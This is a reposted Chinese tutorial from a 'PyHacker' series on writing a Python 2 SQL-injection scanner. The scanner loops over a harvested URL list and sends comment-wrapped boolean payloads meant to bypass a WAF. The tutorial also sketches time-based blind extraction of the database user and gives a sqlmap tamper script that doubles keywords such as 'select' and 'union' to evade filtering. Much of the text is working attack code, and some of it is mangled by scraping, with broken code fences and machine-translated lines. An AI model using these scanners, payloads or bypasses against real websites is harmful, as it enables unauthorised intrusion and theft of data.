【PyHacker编写指南】Sql注入脚本编写

这节课是巡安似海PyHacker编写指南的《Sql注入脚本编写》

有些注入点sqlmap跑不出,例如延时注入,实际延时与语句延时时间不符,sqlmap就跑不出,这就需要我们自己根据实际情况编写脚本来注入了。文末,涉及了sqlmap tamper编写,所以需要一定的python基础才能看懂。

喜欢用Python写脚本的小伙伴可以跟着一起写一写。

编写环境:Python2.x

00×1:
需要用到的模块如下:

python;gutter:true; import requests import re</p> <pre><code> **00x2:** 编写Sql判断 首先我们需要一个payload,最好可以bypass,这样方便测试 ;gutter:true;
?a=/&id=1%20and%201=1%23/

python;gutter:true; url = 'http://127.0.0.1/index.php?id=1' r = r'\?(.<em>)' id = re.findall(r,url) id = id[0] payload = "?a=/</em>&{}%20and%201=1%23*/".format(id)</p> <pre><code> ![【PyHacker编写指南】Sql注入脚本编写](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183508379-1553913963.png) Ok,可以正常输出 再匹配前面的url + payload完美bypass ![【PyHacker编写指南】Sql注入脚本编写](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183603197-320471570.png) 整理一下代码: ;gutter:true;
def url_bypass(url):
r = r’\?(.*)’
id = re.findall(r,url)
id = id[0]
payload = "?a=/*&{}%20and%201=1%23*/".format(id)

urlr = ‘(.*)\?%s’%id
url_ = re.findall(urlr,url)
url_=url_[0]
print url_+payload

url = ‘http://127.0.0.1/index.php?id=1’
url_bypass(url)

将其存储在列表中,我们可以稍后遍历它。

[En]

Store it in the list, and we can just traverse it later.

00×3:
下面来说一下判断原理

python;gutter:true; ?a=/&id=1%20and%201=1%23/ 返回正常 ?a=/&id=1%20and%201=2%23/ 返回错误</p> <p>xor 1=1 返回错误 xor 1=2 返回正常</p> <pre><code> 判断1 != 2 则存在SQL注入漏洞(如上两条语句都可以测试) 我们使用两个单独的请求进行测试,以便代码易于阅读<details><summary>*<font color='gray'>[En]</font>*</summary>*<font color='gray'>We use two separate requests to test so that the code is easy to read</font>*</details> ;gutter:true;
def req1(url):
global html1
headers = {
‘User-Agent’:’Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0′
}
req = requests.get(url,headers=headers,verify=False,timeout=3)
html1 = req.content

def req2(url):
global html2
headers = {
‘User-Agent’:’Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0′
}
req = requests.get(url,headers=headers,verify=False,timeout=3)
html2 = req.content

00×4:
判断SQL注入漏洞

python;gutter:true; def main(): req1(urls[0]) req2(urls[1]) if html1 != html2: print "[+] Find SQL" else: print "NO"</p> <pre><code> 调试一下: ![【PyHacker编写指南】Sql注入脚本编写](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183616667-2143386092.png) **00x5:** 配和前面的教程,我们已经可以采集url,并且深度爬取 采集就不在这里说了,你可以自己去采集一些url 遍历url 判断SQL注入漏洞: ;gutter:true;
if __name__ == ‘__main__’:
f = open(‘url.txt’,’r’)
for url in f:
url = url.strip()
url_bypass(url) # c处理url
main() #判断SQL
urls = [] #清空列表

自动输出结果我就不写了
如前所述,您可以根据自己的需要进行修改。

[En]

As mentioned earlier, you can modify it according to your own needs.

00×6:
完整代码:

python;gutter:true;</p> <h1>!/usr/bin/python</h1> <pre><code>#-*- coding:utf-8 -*- import requests import re import urllib3 urllib3.disable_warnings() urls = [] def url_bypass(url): r = r'\?(.*)' id = re.findall(r,url) id = id[0] payload = "?a=/*&{}%20and%201=1%23*/".format(id) r2 = r'\?(.*)' id2 = re.findall(r2,url) id2 = id2[0] payload2 = "?a=/*&{}%20and%201=2%23*/".format(id2) urlr = '(.*)\?%s'%id url_ = re.findall(urlr,url) url_=url_[0] url_bypass = url_+payload url_bypass2 = url_ + payload2 urls.append(url_bypass) urls.append(url_bypass2) def req1(url): global html1 headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' } req = requests.get(url,headers=headers,verify=False,timeout=3) html1 = req.content def req2(url): global html2 headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' } req = requests.get(url,headers=headers,verify=False,timeout=3) html2 = req.content def main(): try: req1(urls[0]) req2(urls[1]) if html1 != html2: print "[+] Find SQL",urls[1] else: pass except: pass if __name__ == '__main__': f = open('url.txt','r') for url in f: url = url.strip() url_bypass(url) # c处理url main() #判断SQL urls = [] #清空列表 </code></pre> <pre><code> 这里仅以SQL判断思路进行编写,猜测数据库等操作也相同 抛砖引玉,只需要更换sql语句,利用for循环即可 总体思路:(延迟注入获取数据库)<details><summary>*<font color='gray'>[En]</font>*</summary>*<font color='gray'>General idea: (delayed injection to obtain database)</font>*</details> ;gutter:true;
payloads=’abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.’

遍历payloads
判断延迟时间,利用time比较,如果时间大于xxx,则字符存在

python;gutter:true; for x in payloads: url+and if(length(user)=%s,3,0)%x</p> <pre><code> **Pyhacker 之 SQLMAP tamper编写** tamper是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 一个简单的tamper: ;gutter:true;
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOWEST
def dependencies():
pass
def tamper(payload, **kwargs):
return payload.replace("’", "\\’").replace(‘"’, ‘\\"’)

我们只需要修改这两个部分:

[En]

We only need to modify these two parts:

Priority:定义脚本的优先级(默认lowest即可)
tamper:是主要的函数,接受的参数为payload和kwargs

返回值为替换后的payload。比如这个例子中就把引号替换为了\

python;gutter:true; def tamper(payload, **kwargs): headers = kwargs.get("headers", {}) headers["X-originating-IP"] = "127.0.0.1" return payload</p> <pre><code> 修改X-originating-IP 绕过Waf 所以我们只需要仿造进行修改,即可写出我们的tamper 我们来测试一下 我们修改源代码,关键词 替换为空 ![【PyHacker编写指南】Sql注入脚本编写](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183835324-1964642969.png) OK,没毛病 替换为空了,我们可以利用两个seleselectct 绕过 ![【PyHacker编写指南】Sql注入脚本编写](https://johngo-pic.oss-cn-beijing.aliyuncs.com/articles/20230523/2867038-20220515183842330-176649289.png) 测试一下: ;gutter:true;
Sqlmap.py -u "http://127.0.0.1/news.php?id=1" –purge

已经注入不出来结果了,我们来写一个tamper

【PyHacker编写指南】Sql注入脚本编写

利用replace函数进行替换字符

【PyHacker编写指南】Sql注入脚本编写

完整tamper:

python;gutter:true;</p> <h1>!/usr/bin/python</h1> <pre><code>#-*- coding:utf-8 -*- #默认开头 from lib.core.enums import PRIORITY __priority__ = PRIORITY.LOW #等级(LOWEST 最低级) #可有可无 def dependencies(): pass def tamper(payload, **kwargs): playload = payload.replace('and','anandd') playload = playload.replace('xor', 'xoxorr') playload = playload.replace('select', 'selselectect') playload = playload.replace('union', 'uniunionon') playload = playload.replace('if', 'iiff') return playload </code></pre> <pre><code> 放到tamper目录下 ;gutter:true;
Sqlmap.py -u "http://127.0.0.1/news.php?id=1" –purge –tamper "andand.py"

OK,已经注入出来了
方法大同小异,了解waf特征,fuzz bypass

微信公众号关注:巡安似海,每天更新技术文章,网络安全,免杀攻防等文章。

Original: https://www.cnblogs.com/XunanSec/p/pyhacker_sql.html
Author: 巡安似海
Title: 【PyHacker编写指南】Sql注入脚本编写

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/499559/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球